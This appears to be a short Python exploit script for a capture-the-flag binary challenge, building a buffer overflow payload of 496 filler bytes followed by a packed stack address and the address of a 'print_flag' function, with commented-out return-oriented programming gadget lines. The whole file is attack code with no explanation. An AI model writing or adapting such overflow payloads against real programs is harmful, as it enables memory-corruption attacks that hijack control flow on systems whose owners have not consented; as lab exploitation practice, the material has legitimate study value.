#!/usr/bin/python

import os
import struct

# Addresses
#pop_ret = 0x080b4eab
print_flag = 0x80489d5

# Overflow
payload = "A"*496


#payload = "\x90"*0x70
payload += struct.pack("I", 0xffffdd9c)
payload += "\n"
payload += str(0x080489AC)


# Gadget
#payload += struct.pack("<L", print_flag)
#payload += "BBBB" #*0x2

#payload += "C"*0x1

#payload +=struct.pack("I", 0xd)
#payload += struct.pack("I", pop_ret)
#payload += struct.pack("I", print_flag)

#payload += struct.pack("I", 0x0000000d)

#payload += struct.pack('I', 0x00000000)
#payload += struct.pack('I', 0x00000000)

print("%s" % payload)

#payload += struct.pack("I", 0x080489c7)
#os.system("a.out %s" % payload)
#print(payload)
